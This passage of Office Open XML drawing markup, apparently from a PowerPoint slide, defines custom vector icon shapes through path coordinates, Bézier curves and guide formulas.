                    <a:pt x="1492066" y="3590505"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1492066" y="3729696"/>
                    <a:pt x="1379229" y="3842533"/>
                    <a:pt x="1240038" y="3842533"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1100847" y="3842533"/>
                    <a:pt x="988010" y="3729696"/>
                    <a:pt x="988010" y="3590505"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="988010" y="3096582"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="879975" y="3096582"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="714268" y="3096582"/>
                    <a:pt x="579936" y="2962250"/>
                    <a:pt x="579936" y="2796543"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3067842" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3207033" y="1281925"/>
                    <a:pt x="3319870" y="1394762"/>
                    <a:pt x="3319870" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3319870" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3319870" y="2645088"/>
                    <a:pt x="3207033" y="2757925"/>
                    <a:pt x="3067842" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2928651" y="2757925"/>
                    <a:pt x="2815814" y="2645088"/>
                    <a:pt x="2815814" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2815814" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2815814" y="1394762"/>
                    <a:pt x="2928651" y="1281925"/>
                    <a:pt x="3067842" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="252028" y="1281925"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="391219" y="1281925"/>
                    <a:pt x="504056" y="1394762"/>
                    <a:pt x="504056" y="1533953"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="504056" y="2505897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="504056" y="2645088"/>
                    <a:pt x="391219" y="2757925"/>
                    <a:pt x="252028" y="2757925"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="112837" y="2757925"/>
                    <a:pt x="0" y="2645088"/>
                    <a:pt x="0" y="2505897"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="1533953"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1394762"/>
                    <a:pt x="112837" y="1281925"/>
                    <a:pt x="252028" y="1281925"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2134062" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2073373" y="558521"/>
                    <a:pt x="2024174" y="607720"/>
                    <a:pt x="2024174" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2024174" y="729098"/>
                    <a:pt x="2073373" y="778297"/>
                    <a:pt x="2134062" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2194751" y="778297"/>
                    <a:pt x="2243950" y="729098"/>
                    <a:pt x="2243950" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2243950" y="607720"/>
                    <a:pt x="2194751" y="558521"/>
                    <a:pt x="2134062" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1177409" y="558521"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="1116720" y="558521"/>
                    <a:pt x="1067521" y="607720"/>
                    <a:pt x="1067521" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1067521" y="729098"/>
                    <a:pt x="1116720" y="778297"/>
                    <a:pt x="1177409" y="778297"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1238098" y="778297"/>
                    <a:pt x="1287297" y="729098"/>
                    <a:pt x="1287297" y="668409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1287297" y="607720"/>
                    <a:pt x="1238098" y="558521"/>
                    <a:pt x="1177409" y="558521"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1041854" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1215617" y="300965"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1350827" y="238508"/>
                    <a:pt x="1501239" y="204386"/>
                    <a:pt x="1659158" y="204272"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1823689" y="204153"/>
                    <a:pt x="1980124" y="240963"/>
                    <a:pt x="2119837" y="308065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2297698" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2391229" y="54000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2215205" y="358882"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2507692" y="533629"/>
                    <a:pt x="2710924" y="843756"/>
                    <a:pt x="2737127" y="1206450"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2018962" y="1206967"/>
                    <a:pt x="1300797" y="1207483"/>
                    <a:pt x="582632" y="1208000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="608780" y="838665"/>
                    <a:pt x="818541" y="523565"/>
                    <a:pt x="1119462" y="350420"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="948323" y="540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C0C7969F-A090-4D7D-AE69-318914512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5011" y="2518278"/>
              <a:ext cx="340001" cy="338281"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2956013" h="2941055"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B9186B4-3CAE-4B1B-9EE5-82556E22D24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45251" y="2251006"/>
              <a:ext cx="441966" cy="281210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AE4B125-6999-45DF-B3C8-56A855BA5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273" y="3365017"/>
              <a:ext cx="357359" cy="364685"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3860876" h="3940019">
                  <a:moveTo>
                    <a:pt x="3248876" y="1942264"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="1942264"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3860876" y="2090815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3859023" y="2090815"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3817225" y="2949620"/>
                    <a:pt x="3215273" y="3679864"/>
                    <a:pt x="2378197" y="3884304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2219818" y="3922985"/>
                    <a:pt x="2060231" y="3941082"/>
                    <a:pt x="1902626" y="3939971"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1286982" y="3935631"/>
                    <a:pt x="701577" y="3638194"/>
                    <a:pt x="337583" y="3128887"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="30667" y="3435803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30667" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1124425" y="2342045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="781340" y="2685130"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1079782" y="3180935"/>
                    <a:pt x="1667379" y="3425841"/>
                    <a:pt x="2232517" y="3287817"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2810639" y="3146622"/>
                    <a:pt x="3224897" y="2638979"/>
                    <a:pt x="3247291" y="2044286"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3248876" y="2044345"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1958249" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2573893" y="4388"/>
                    <a:pt x="3159298" y="301825"/>
                    <a:pt x="3523293" y="811132"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="504216"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3830209" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2736450" y="1597974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3079535" y="1254889"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2781093" y="759084"/>
                    <a:pt x="2193496" y="514178"/>
                    <a:pt x="1628358" y="652202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1050236" y="793397"/>
                    <a:pt x="635978" y="1301040"/>
                    <a:pt x="613584" y="1895733"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1895674"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="612000" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1985958"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1837407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2787" y="1837407"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="49183" y="983705"/>
                    <a:pt x="649445" y="259216"/>
                    <a:pt x="1482678" y="55715"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1641057" y="17034"/>
                    <a:pt x="1800644" y="-1063"/>
                    <a:pt x="195824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16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1F6F3B5-823E-442B-809C-F7DFF41F2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8038" y="5418963"/>
              <a:ext cx="353455" cy="397548"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1376433 w 2765122"/>
                <a:gd name="connsiteY0" fmla="*/ 2257187 h 3110058"/>
                <a:gd name="connsiteX1" fmla="*/ 1145400 w 2765122"/>
                <a:gd name="connsiteY1" fmla="*/ 2354829 h 3110058"/>
                <a:gd name="connsiteX2" fmla="*/ 1036105 w 2765122"/>
                <a:gd name="connsiteY2" fmla="*/ 2389775 h 3110058"/>
                <a:gd name="connsiteX3" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY3" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX4" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY4" fmla="*/ 2894301 h 3110058"/>
                <a:gd name="connsiteX5" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY5" fmla="*/ 2406930 h 3110058"/>
                <a:gd name="connsiteX6" fmla="*/ 1726723 w 2765122"/>
                <a:gd name="connsiteY6" fmla="*/ 2399874 h 3110058"/>
                <a:gd name="connsiteX7" fmla="*/ 1605728 w 2765122"/>
                <a:gd name="connsiteY7" fmla="*/ 2358846 h 3110058"/>
                <a:gd name="connsiteX8" fmla="*/ 1795887 w 2765122"/>
                <a:gd name="connsiteY8" fmla="*/ 2033026 h 3110058"/>
                <a:gd name="connsiteX9" fmla="*/ 1694075 w 2765122"/>
                <a:gd name="connsiteY9" fmla="*/ 2094586 h 3110058"/>
                <a:gd name="connsiteX10" fmla="*/ 1578650 w 2765122"/>
                <a:gd name="connsiteY10" fmla="*/ 2155153 h 3110058"/>
                <a:gd name="connsiteX11" fmla="*/ 1618821 w 2765122"/>
                <a:gd name="connsiteY11" fmla="*/ 2173994 h 3110058"/>
                <a:gd name="connsiteX12" fmla="*/ 1763952 w 2765122"/>
                <a:gd name="connsiteY12" fmla="*/ 2229138 h 3110058"/>
                <a:gd name="connsiteX13" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY13" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX14" fmla="*/ 969005 w 2765122"/>
                <a:gd name="connsiteY14" fmla="*/ 2030800 h 3110058"/>
                <a:gd name="connsiteX15" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY15" fmla="*/ 2076334 h 3110058"/>
                <a:gd name="connsiteX16" fmla="*/ 997942 w 2765122"/>
                <a:gd name="connsiteY16" fmla="*/ 2219324 h 3110058"/>
                <a:gd name="connsiteX17" fmla="*/ 1135534 w 2765122"/>
                <a:gd name="connsiteY17" fmla="*/ 2169774 h 3110058"/>
                <a:gd name="connsiteX18" fmla="*/ 1176026 w 2765122"/>
                <a:gd name="connsiteY18" fmla="*/ 2151638 h 3110058"/>
                <a:gd name="connsiteX19" fmla="*/ 1061678 w 2765122"/>
                <a:gd name="connsiteY19" fmla="*/ 2089068 h 3110058"/>
                <a:gd name="connsiteX20" fmla="*/ 2270995 w 2765122"/>
                <a:gd name="connsiteY20" fmla="*/ 1682607 h 3110058"/>
                <a:gd name="connsiteX21" fmla="*/ 2193789 w 2765122"/>
                <a:gd name="connsiteY21" fmla="*/ 1749541 h 3110058"/>
                <a:gd name="connsiteX22" fmla="*/ 2080535 w 2765122"/>
                <a:gd name="connsiteY22" fmla="*/ 1839120 h 3110058"/>
                <a:gd name="connsiteX23" fmla="*/ 1988274 w 2765122"/>
                <a:gd name="connsiteY23" fmla="*/ 1905861 h 3110058"/>
                <a:gd name="connsiteX24" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY24" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX25" fmla="*/ 1929983 w 2765122"/>
                <a:gd name="connsiteY25" fmla="*/ 2282840 h 3110058"/>
                <a:gd name="connsiteX26" fmla="*/ 2032699 w 2765122"/>
                <a:gd name="connsiteY26" fmla="*/ 2311732 h 3110058"/>
                <a:gd name="connsiteX27" fmla="*/ 2530541 w 2765122"/>
                <a:gd name="connsiteY27" fmla="*/ 2244806 h 3110058"/>
                <a:gd name="connsiteX28" fmla="*/ 2289139 w 2765122"/>
                <a:gd name="connsiteY28" fmla="*/ 1700285 h 3110058"/>
                <a:gd name="connsiteX29" fmla="*/ 491768 w 2765122"/>
                <a:gd name="connsiteY29" fmla="*/ 1666932 h 3110058"/>
                <a:gd name="connsiteX30" fmla="*/ 473585 w 2765122"/>
                <a:gd name="connsiteY30" fmla="*/ 1684439 h 3110058"/>
                <a:gd name="connsiteX31" fmla="*/ 222717 w 2765122"/>
                <a:gd name="connsiteY31" fmla="*/ 2224664 h 3110058"/>
                <a:gd name="connsiteX32" fmla="*/ 719315 w 2765122"/>
                <a:gd name="connsiteY32" fmla="*/ 2300269 h 3110058"/>
                <a:gd name="connsiteX33" fmla="*/ 831176 w 2765122"/>
                <a:gd name="connsiteY33" fmla="*/ 2270901 h 3110058"/>
                <a:gd name="connsiteX34" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY34" fmla="*/ 2160317 h 3110058"/>
                <a:gd name="connsiteX35" fmla="*/ 776012 w 2765122"/>
                <a:gd name="connsiteY35" fmla="*/ 1899134 h 3110058"/>
                <a:gd name="connsiteX36" fmla="*/ 679735 w 2765122"/>
                <a:gd name="connsiteY36" fmla="*/ 1826895 h 3110058"/>
                <a:gd name="connsiteX37" fmla="*/ 502637 w 2765122"/>
                <a:gd name="connsiteY37" fmla="*/ 1677612 h 3110058"/>
                <a:gd name="connsiteX38" fmla="*/ 2001099 w 2765122"/>
                <a:gd name="connsiteY38" fmla="*/ 1443878 h 3110058"/>
                <a:gd name="connsiteX39" fmla="*/ 2005588 w 2765122"/>
                <a:gd name="connsiteY39" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX40" fmla="*/ 2000712 w 2765122"/>
                <a:gd name="connsiteY40" fmla="*/ 1675767 h 3110058"/>
                <a:gd name="connsiteX41" fmla="*/ 2038461 w 2765122"/>
                <a:gd name="connsiteY41" fmla="*/ 1648469 h 3110058"/>
                <a:gd name="connsiteX42" fmla="*/ 2130505 w 2765122"/>
                <a:gd name="connsiteY42" fmla="*/ 1573751 h 3110058"/>
                <a:gd name="connsiteX43" fmla="*/ 2143759 w 2765122"/>
                <a:gd name="connsiteY43" fmla="*/ 1562074 h 3110058"/>
                <a:gd name="connsiteX44" fmla="*/ 2039991 w 2765122"/>
                <a:gd name="connsiteY44" fmla="*/ 1473050 h 3110058"/>
                <a:gd name="connsiteX45" fmla="*/ 764411 w 2765122"/>
                <a:gd name="connsiteY45" fmla="*/ 1434288 h 3110058"/>
                <a:gd name="connsiteX46" fmla="*/ 726661 w 2765122"/>
                <a:gd name="connsiteY46" fmla="*/ 1461587 h 3110058"/>
                <a:gd name="connsiteX47" fmla="*/ 634617 w 2765122"/>
                <a:gd name="connsiteY47" fmla="*/ 1536305 h 3110058"/>
                <a:gd name="connsiteX48" fmla="*/ 621360 w 2765122"/>
                <a:gd name="connsiteY48" fmla="*/ 1547985 h 3110058"/>
                <a:gd name="connsiteX49" fmla="*/ 725129 w 2765122"/>
                <a:gd name="connsiteY49" fmla="*/ 1637009 h 3110058"/>
                <a:gd name="connsiteX50" fmla="*/ 764024 w 2765122"/>
                <a:gd name="connsiteY50" fmla="*/ 1666183 h 3110058"/>
                <a:gd name="connsiteX51" fmla="*/ 759534 w 2765122"/>
                <a:gd name="connsiteY51" fmla="*/ 1555029 h 3110058"/>
                <a:gd name="connsiteX52" fmla="*/ 1386966 w 2765122"/>
                <a:gd name="connsiteY52" fmla="*/ 1049980 h 3110058"/>
                <a:gd name="connsiteX53" fmla="*/ 1160689 w 2765122"/>
                <a:gd name="connsiteY53" fmla="*/ 1170734 h 3110058"/>
                <a:gd name="connsiteX54" fmla="*/ 947211 w 2765122"/>
                <a:gd name="connsiteY54" fmla="*/ 1303680 h 3110058"/>
                <a:gd name="connsiteX55" fmla="*/ 938816 w 2765122"/>
                <a:gd name="connsiteY55" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX56" fmla="*/ 947046 w 2765122"/>
                <a:gd name="connsiteY56" fmla="*/ 1801432 h 3110058"/>
                <a:gd name="connsiteX57" fmla="*/ 1154015 w 2765122"/>
                <a:gd name="connsiteY57" fmla="*/ 1935392 h 3110058"/>
                <a:gd name="connsiteX58" fmla="*/ 1378151 w 2765122"/>
                <a:gd name="connsiteY58" fmla="*/ 2060078 h 3110058"/>
                <a:gd name="connsiteX59" fmla="*/ 1604433 w 2765122"/>
                <a:gd name="connsiteY59" fmla="*/ 1939321 h 3110058"/>
                <a:gd name="connsiteX60" fmla="*/ 1817909 w 2765122"/>
                <a:gd name="connsiteY60" fmla="*/ 1806377 h 3110058"/>
                <a:gd name="connsiteX61" fmla="*/ 1826304 w 2765122"/>
                <a:gd name="connsiteY61" fmla="*/ 1555028 h 3110058"/>
                <a:gd name="connsiteX62" fmla="*/ 1818074 w 2765122"/>
                <a:gd name="connsiteY62" fmla="*/ 1308628 h 3110058"/>
                <a:gd name="connsiteX63" fmla="*/ 1611105 w 2765122"/>
                <a:gd name="connsiteY63" fmla="*/ 1174667 h 3110058"/>
                <a:gd name="connsiteX64" fmla="*/ 1767179 w 2765122"/>
                <a:gd name="connsiteY64" fmla="*/ 890733 h 3110058"/>
                <a:gd name="connsiteX65" fmla="*/ 1629589 w 2765122"/>
                <a:gd name="connsiteY65" fmla="*/ 940281 h 3110058"/>
                <a:gd name="connsiteX66" fmla="*/ 1589093 w 2765122"/>
                <a:gd name="connsiteY66" fmla="*/ 958419 h 3110058"/>
                <a:gd name="connsiteX67" fmla="*/ 1703444 w 2765122"/>
                <a:gd name="connsiteY67" fmla="*/ 1020991 h 3110058"/>
                <a:gd name="connsiteX68" fmla="*/ 1796116 w 2765122"/>
                <a:gd name="connsiteY68" fmla="*/ 1079257 h 3110058"/>
                <a:gd name="connsiteX69" fmla="*/ 1791432 w 2765122"/>
                <a:gd name="connsiteY69" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX70" fmla="*/ 1001168 w 2765122"/>
                <a:gd name="connsiteY70" fmla="*/ 880921 h 3110058"/>
                <a:gd name="connsiteX71" fmla="*/ 973688 w 2765122"/>
                <a:gd name="connsiteY71" fmla="*/ 1033723 h 3110058"/>
                <a:gd name="connsiteX72" fmla="*/ 969233 w 2765122"/>
                <a:gd name="connsiteY72" fmla="*/ 1077033 h 3110058"/>
                <a:gd name="connsiteX73" fmla="*/ 1071048 w 2765122"/>
                <a:gd name="connsiteY73" fmla="*/ 1015472 h 3110058"/>
                <a:gd name="connsiteX74" fmla="*/ 1186470 w 2765122"/>
                <a:gd name="connsiteY74" fmla="*/ 954907 h 3110058"/>
                <a:gd name="connsiteX75" fmla="*/ 1146299 w 2765122"/>
                <a:gd name="connsiteY75" fmla="*/ 936065 h 3110058"/>
                <a:gd name="connsiteX76" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY76" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX77" fmla="*/ 2045808 w 2765122"/>
                <a:gd name="connsiteY77" fmla="*/ 809787 h 3110058"/>
                <a:gd name="connsiteX78" fmla="*/ 1933945 w 2765122"/>
                <a:gd name="connsiteY78" fmla="*/ 839155 h 3110058"/>
                <a:gd name="connsiteX79" fmla="*/ 1956628 w 2765122"/>
                <a:gd name="connsiteY79" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX80" fmla="*/ 1989111 w 2765122"/>
                <a:gd name="connsiteY80" fmla="*/ 1210925 h 3110058"/>
                <a:gd name="connsiteX81" fmla="*/ 2085387 w 2765122"/>
                <a:gd name="connsiteY81" fmla="*/ 1283163 h 3110058"/>
                <a:gd name="connsiteX82" fmla="*/ 2262485 w 2765122"/>
                <a:gd name="connsiteY82" fmla="*/ 1432446 h 3110058"/>
                <a:gd name="connsiteX83" fmla="*/ 2273353 w 2765122"/>
                <a:gd name="connsiteY83" fmla="*/ 1443125 h 3110058"/>
                <a:gd name="connsiteX84" fmla="*/ 2291537 w 2765122"/>
                <a:gd name="connsiteY84" fmla="*/ 1425616 h 3110058"/>
                <a:gd name="connsiteX85" fmla="*/ 2542406 w 2765122"/>
                <a:gd name="connsiteY85" fmla="*/ 885391 h 3110058"/>
                <a:gd name="connsiteX86" fmla="*/ 2296662 w 2765122"/>
                <a:gd name="connsiteY86" fmla="*/ 783036 h 3110058"/>
                <a:gd name="connsiteX87" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY87" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX88" fmla="*/ 234579 w 2765122"/>
                <a:gd name="connsiteY88" fmla="*/ 865253 h 3110058"/>
                <a:gd name="connsiteX89" fmla="*/ 475981 w 2765122"/>
                <a:gd name="connsiteY89" fmla="*/ 1409774 h 3110058"/>
                <a:gd name="connsiteX90" fmla="*/ 494126 w 2765122"/>
                <a:gd name="connsiteY90" fmla="*/ 1427453 h 3110058"/>
                <a:gd name="connsiteX91" fmla="*/ 571333 w 2765122"/>
                <a:gd name="connsiteY91" fmla="*/ 1360517 h 3110058"/>
                <a:gd name="connsiteX92" fmla="*/ 684587 w 2765122"/>
                <a:gd name="connsiteY92" fmla="*/ 1270938 h 3110058"/>
                <a:gd name="connsiteX93" fmla="*/ 776848 w 2765122"/>
                <a:gd name="connsiteY93" fmla="*/ 1204197 h 3110058"/>
                <a:gd name="connsiteX94" fmla="*/ 808495 w 2765122"/>
                <a:gd name="connsiteY94" fmla="*/ 949742 h 3110058"/>
                <a:gd name="connsiteX95" fmla="*/ 835139 w 2765122"/>
                <a:gd name="connsiteY95" fmla="*/ 827220 h 3110058"/>
                <a:gd name="connsiteX96" fmla="*/ 732420 w 2765122"/>
                <a:gd name="connsiteY96" fmla="*/ 798327 h 3110058"/>
                <a:gd name="connsiteX97" fmla="*/ 482072 w 2765122"/>
                <a:gd name="connsiteY97" fmla="*/ 767202 h 3110058"/>
                <a:gd name="connsiteX98" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY98" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX99" fmla="*/ 1040146 w 2765122"/>
                <a:gd name="connsiteY99" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX100" fmla="*/ 1038397 w 2765122"/>
                <a:gd name="connsiteY100" fmla="*/ 710184 h 3110058"/>
                <a:gd name="connsiteX101" fmla="*/ 1159394 w 2765122"/>
                <a:gd name="connsiteY101" fmla="*/ 751212 h 3110058"/>
                <a:gd name="connsiteX102" fmla="*/ 1388689 w 2765122"/>
                <a:gd name="connsiteY102" fmla="*/ 852872 h 3110058"/>
                <a:gd name="connsiteX103" fmla="*/ 1619722 w 2765122"/>
                <a:gd name="connsiteY103" fmla="*/ 755229 h 3110058"/>
                <a:gd name="connsiteX104" fmla="*/ 1729016 w 2765122"/>
                <a:gd name="connsiteY104" fmla="*/ 720284 h 3110058"/>
                <a:gd name="connsiteX105" fmla="*/ 1724974 w 2765122"/>
                <a:gd name="connsiteY105" fmla="*/ 703126 h 3110058"/>
                <a:gd name="connsiteX106" fmla="*/ 1382560 w 2765122"/>
                <a:gd name="connsiteY106" fmla="*/ 215755 h 3110058"/>
                <a:gd name="connsiteX107" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY107" fmla="*/ 0 h 3110058"/>
                <a:gd name="connsiteX108" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY108" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX109" fmla="*/ 1892754 w 2765122"/>
                <a:gd name="connsiteY109" fmla="*/ 669221 h 3110058"/>
                <a:gd name="connsiteX110" fmla="*/ 1998805 w 2765122"/>
                <a:gd name="connsiteY110" fmla="*/ 644109 h 3110058"/>
                <a:gd name="connsiteX111" fmla="*/ 2729256 w 2765122"/>
                <a:gd name="connsiteY111" fmla="*/ 777515 h 3110058"/>
                <a:gd name="connsiteX112" fmla="*/ 2479563 w 2765122"/>
                <a:gd name="connsiteY112" fmla="*/ 1476806 h 3110058"/>
                <a:gd name="connsiteX113" fmla="*/ 2396868 w 2765122"/>
                <a:gd name="connsiteY113" fmla="*/ 1564493 h 3110058"/>
                <a:gd name="connsiteX114" fmla="*/ 2415853 w 2765122"/>
                <a:gd name="connsiteY114" fmla="*/ 1583149 h 3110058"/>
                <a:gd name="connsiteX115" fmla="*/ 2715481 w 2765122"/>
                <a:gd name="connsiteY115" fmla="*/ 2355928 h 3110058"/>
                <a:gd name="connsiteX116" fmla="*/ 1982813 w 2765122"/>
                <a:gd name="connsiteY116" fmla="*/ 2476565 h 3110058"/>
                <a:gd name="connsiteX117" fmla="*/ 1890625 w 2765122"/>
                <a:gd name="connsiteY117" fmla="*/ 2453030 h 3110058"/>
                <a:gd name="connsiteX118" fmla="*/ 1863319 w 2765122"/>
                <a:gd name="connsiteY118" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX119" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY119" fmla="*/ 3110058 h 3110058"/>
                <a:gd name="connsiteX120" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY120" fmla="*/ 2544172 h 3110058"/>
                <a:gd name="connsiteX121" fmla="*/ 872368 w 2765122"/>
                <a:gd name="connsiteY121" fmla="*/ 2440837 h 3110058"/>
                <a:gd name="connsiteX122" fmla="*/ 766317 w 2765122"/>
                <a:gd name="connsiteY122" fmla="*/ 2465949 h 3110058"/>
                <a:gd name="connsiteX123" fmla="*/ 35866 w 2765122"/>
                <a:gd name="connsiteY123" fmla="*/ 2332544 h 3110058"/>
                <a:gd name="connsiteX124" fmla="*/ 285559 w 2765122"/>
                <a:gd name="connsiteY124" fmla="*/ 1633252 h 3110058"/>
                <a:gd name="connsiteX125" fmla="*/ 368254 w 2765122"/>
                <a:gd name="connsiteY125" fmla="*/ 1545565 h 3110058"/>
                <a:gd name="connsiteX126" fmla="*/ 349269 w 2765122"/>
                <a:gd name="connsiteY126" fmla="*/ 1526910 h 3110058"/>
                <a:gd name="connsiteX127" fmla="*/ 49641 w 2765122"/>
                <a:gd name="connsiteY127" fmla="*/ 754130 h 3110058"/>
                <a:gd name="connsiteX128" fmla="*/ 782309 w 2765122"/>
                <a:gd name="connsiteY128" fmla="*/ 633493 h 3110058"/>
                <a:gd name="connsiteX129" fmla="*/ 874497 w 2765122"/>
                <a:gd name="connsiteY129" fmla="*/ 657029 h 3110058"/>
                <a:gd name="connsiteX130" fmla="*/ 901803 w 2765122"/>
                <a:gd name="connsiteY130" fmla="*/ 565886 h 3110058"/>
                <a:gd name="connsiteX131" fmla="*/ 1382561 w 2765122"/>
                <a:gd name="connsiteY131" fmla="*/ 0 h 31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765122" h="3110058">
                  <a:moveTo>
                    <a:pt x="1376433" y="2257187"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1145400" y="2354829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1036105" y="2389775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1040146" y="2406930"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1121535" y="2704580"/>
                    <a:pt x="1244707" y="2894301"/>
                    <a:pt x="1382560" y="2894301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
